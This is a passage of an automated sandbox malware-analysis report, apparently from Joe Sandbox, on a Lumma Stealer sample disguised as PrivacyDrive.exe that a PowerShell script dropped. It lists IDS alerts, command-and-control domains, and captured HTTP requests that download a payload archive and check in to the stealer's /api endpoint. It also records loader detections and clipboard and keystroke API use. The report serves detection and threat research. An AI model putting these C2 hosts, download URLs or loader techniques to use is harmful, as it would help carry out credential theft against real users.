    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx8_2_011F6B80
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_011F0BAC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]8_2_01202BC9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_01202BC9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_01202BC9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebp, word ptr [edi]8_2_0120EA30
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_011F0A01
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, 0000000Bh8_2_01203AB3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]8_2_011DDAB0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h8_2_011E5ADF
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]8_2_011D5D10
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_011FED6D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_011FED6D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx8_2_01219C10
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh8_2_011FBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh8_2_011FBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_011F8C90
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]8_2_011D4CB0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h8_2_011EDCC2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_011E0F0F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov dword ptr [esp], 00000000h8_2_011EAF50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_011E3FA9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]8_2_011E3FA9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_01217E30
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh8_2_01217E30
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then push ebx8_2_011EDE33
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, ecx8_2_011E3EA6

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49748 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49745 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49744 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.4:50546 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49749 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49744 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49745 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 172.67.206.221:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: abortinoiwiam.shop
    Source: Malware configuration extractorURLs: deallyharvenw.shop
    Source: Malware configuration extractorURLs: defenddsouneuw.shop
    Source: Malware configuration extractorURLs: pumpkinkwquo.shop
    Source: Malware configuration extractorURLs: covvercilverow.shop
    Source: Malware configuration extractorURLs: surroundeocw.shop
    Source: Malware configuration extractorURLs: priooozekw.shop
    Source: Malware configuration extractorURLs: candleduseiwo.shop
    Source: Malware configuration extractorURLs: racedsuitreow.shop
    Source: Joe Sandbox ViewIP Address: 185.255.122.133 185.255.122.133
    Source: Joe Sandbox ViewIP Address: 172.67.206.221 172.67.206.221
    Source: Joe Sandbox ViewASN Name: ICMESE ICMESE
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /uploads/il2.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: finalstepgo.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=2VbLUtXoIqa2pl0uSvd6B6CRPFFCp4FfUF1UfiX3kg8-1727365608-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: racedsuitreow.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=fw93lyY_BMEJeILlolM3es0EfUXi8G49RoVHMxHuql0-1727365619-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: racedsuitreow.shop
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /uploads/il2.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: finalstepgo.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /uploads/il222.zip HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Thu, 26 Sep 2024 14:09:59 GMTUser-Agent: Microsoft BITS/7.8Host: finalstepgo.com
    Source: global trafficDNS traffic detected: DNS query: finalstepgo.com
    Source: global trafficDNS traffic detected: DNS query: candleduseiwo.shop
    Source: global trafficDNS traffic detected: DNS query: racedsuitreow.shop
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://crl.thawte.com/ThawtePremiumServerCA.crl0
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: svchost.exe, 00000003.00000002.2896624234.0000024B0900D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
    Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B0924D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://ocsp.thawte.com0
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://s.symcd.com06
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://t2.symcb.com0
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://tl.symcb.com/tl.crl0
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://tl.symcb.com/tl.crt0
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://tl.symcd.com0&
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: PrivacyDrive.exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
    Source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.drString found in binary or memory: http://www.privacy-drive.comx
    Source: PrivacyDrive.exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
    Source: PrivacyDrive.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
    Source: PrivacyDrive.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
    Source: svchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://finalstepgo.com/
    Source: svchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://finalstepgo.com/a
    Source: svchost.exe, 00000003.00000002.2896185836.0000024B04302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2895863314.0000024B03A5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1825018991.0000024B08F61000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: https://finalstepgo.com/uploads/il222.zip
    Source: svchost.exe, 00000003.00000002.2896857883.0000024B090DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://finalstepgo.com/uploads/il222.zipK
    Source: svchost.exe, 00000003.00000002.2896766529.0000024B0905B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://finalstepgo.com:443/uploads/il222.zip
    Source: svchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://finalstepgo.com:443/uploads/il222.zipe
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
    Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
    Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
    Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
    Source: edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
    Source: PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/
    Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001722000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1933666752.000000000171F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/)e3
    Source: PrivacyDrive.exe, 00000008.00000002.2150460238.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/3
    Source: PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/P
    Source: PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923428960.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001557000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.000000000153A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/api
    Source: PrivacyDrive.exe, 00000008.00000002.2150460238.000000000153A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/apiJV&
    Source: PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/apiU.h
    Source: PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/apiV
    Source: PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015EF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028967735.00000000015F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/apie
    Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/apisP
    Source: PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop:443/api
    Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923320011.0000000001718000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-ma
    Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: PrivacyDrive.exe.2.drString found in binary or memory: https://www.cybertronsoft.com
    Source: PrivacyDrive.exe.2.drString found in binary or memory: https://www.thawte.com/cps0
    Source: PrivacyDrive.exe.2.drString found in binary or memory: https://www.thawte.com/cps0/
    Source: PrivacyDrive.exe.2.drString found in binary or memory: https://www.thawte.com/repository0W
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownHTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49744 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49748 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49749 version: TLS 1.2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00424260 OpenClipboard,GetClipboardData,CloseClipboard,4_2_00424260
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00424260 OpenClipboard,GetClipboardData,CloseClipboard,4_2_00424260
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00422070 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,4_2_00422070

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
    Source: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
    Powershell drops PE file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeJump to dropped file
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FDC583 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,4_2_00FDC583
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00FCC583 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,8_2_00FCC583
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0045D070: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle,4_2_0045D070
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0041D0B0 PathFileExistsW,OpenSCManagerW,GetLastError,OpenServiceW,CloseServiceHandle,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,4_2_0041D0B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0050E6404_2_0050E640
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0043D0904_2_0043D090
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0050F1584_2_0050F158
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0050715B4_2_0050715B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004E93504_2_004E9350
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004133B04_2_004133B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0049B4704_2_0049B470
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0050E6744_2_0050E674
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0044B6304_2_0044B630
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0051B6804_2_0051B680
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0045F7704_2_0045F770
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004237D04_2_004237D0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004C38504_2_004C3850
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004C28B04_2_004C28B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0050F9554_2_0050F955
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0050F9744_2_0050F974
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0044AB404_2_0044AB40
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004AEBE04_2_004AEBE0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0040FD704_2_0040FD70
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00514E404_2_00514E40
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00441E604_2_00441E60
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FDC5834_2_00FDC583
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F8055F4_2_00F8055F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FB80E24_2_00FB80E2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F931C24_2_00F931C2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FCC2B24_2_00FCC2B2
